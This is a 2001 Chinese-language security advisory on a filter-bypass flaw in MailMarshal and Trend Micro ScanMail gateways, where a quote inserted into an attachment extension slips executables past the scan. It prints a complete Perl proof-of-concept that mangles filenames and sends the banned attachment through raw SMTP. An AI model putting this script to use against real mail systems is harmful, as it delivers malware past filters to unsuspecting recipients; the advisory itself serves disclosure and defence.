安全研究
安全漏洞
多家厂商的附件保护绕过漏洞
发布日期:2001-07-25
更新日期:2001-08-01
受影响系统:
描述:
Softek MailMarshal 4.2
Softek MailMarshal 4.1
Softek MailMarshal 4.0
Trend Micro ScanMail 1.0
BUGTRAQ ID : 3097
目前至少有两种SMTP网关产品证实在处理受限制的文件类型作为附件时存在缺陷。
攻击者可以在作为附件的文件扩展名中插入一些特殊字符,这样就可以绕过这些SMTP网
关产品的检查,但是Microsoft Outlook会自动去掉文件扩展名中的非法字符,这样具
有合法扩展名的可执行附件就被发送给接受者。
<*来源:Huskey, Clark (Huskeycd@agedwards.com)*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Aidan (aidan.ok@oceanfree.net)提供了如下测试代码:
#!/usr/bin/perl
# attqt.pl 0.1 by Aidan O'Kelly July 2001
# Send banned attachments through SMTP gateways, this works because MS
Outlook removes illegal
# characters in filenames. So when you put an illegal char (such as ") in
the extension. The Gateway will
# not recognize it as a dangerous attachment. However, when the user on
the other end opens it the illegal
# char will be removed.
#
# Feedback welcome. aidan.ok@oceanfree.net
#
# This is known to work on MailMarshall and TrendMicro Scanmail. Others
have not been tested but most are
# probably vulnerable. If it works on any others, please mail me and let
me know.
# This only puts in one quote after the dot (eg virus."vbs or virus."exe)
# Some gateways might still pick up on the vbs. you can put in more or
different
# charachters like virus.%v"b********s if you feel like it.
# $filename =~ s/\./\.\"/g; is the line that changes it.
use Getopt::Std;
use MIME::Base64 qw(encode_base64);
use IO::Socket::INET;
getopt('atfhsb');
if (!$opt_a || !$opt_f || !$opt_t || !$opt_h)
{
print "Usage: attqt.pl <-a attachment> <-t to> <-f from> <-h smtphost>
[-s subject] [-b text]\n";
exit;
}
open(FILE, $opt_a) or die "$!";
binmode FILE;
while (read(FILE, $buf, 60*57)) {
$attachment = $attachment . encode_base64($buf);
}
close(FILE);
$filename = $opt_a;
$filename =~ s/\./\.\"/g;
print "$filename\n";
$sock = IO::Socket::INET->new(PeerAddr => "$opt_h",PeerPort => '25', Proto
=> 'tcp');
unless (<$sock> =~ "220") { die "Not a SMTP Server?" }
print $sock "HELO you\r\n";
unless (<$sock> =~ "250") { die "HELO failed" }
print $sock "MAIL FROM:<>\r\n";
unless (<$sock> =~ "250") { die "MAIL FROM failed" }
print $sock "RCPT TO:<$opt_t>\r\n";
unless (<$sock> =~ "250") { die "RCPT TO failed" }
print $sock "DATA\r\n";
unless (<$sock> =~ "354") { die "DATA failed" }
print $sock "From: $opt_f\n";
print $sock "To: $opt_t\n";
print $sock "Subject: $opt_s\n";
print $sock "MIME-Version: 1.0
Content-Type: multipart/related;
type=\"multipart/alternative\";
boundary=\"NextPart19\"
This is a multi-part message in MIME format.
--NextPart19
Content-Type: multipart/alternative;
boundary=\"NextPart20\"
--NextPart20
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
--NextPart20
Content-Type: text/html;
charset=\"iso-8859-1\"
Content-Transfer-Encoding: quoted-printable
";
print $sock "$opt_b\n";
print $sock "--NextPart20--
--NextPart19
Content-Type: application/x-msdownload
Content-Disposition: attachment;filename=\"$filename\"
Content-Transfer-Encoding: base64\r\n\n";
print $sock $attachment;
print $sock "\r\n--NextPart19--\n.\n";
print "Finished sending data\n";
$a = <$sock>;
print "$a\n";
close($sock);
建议:
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.softek.co.uk/
http://www.antivirus.com/products/smex/
浏览次数:3689
严重程度:0(网友投票)
绿盟科技给您安全的保障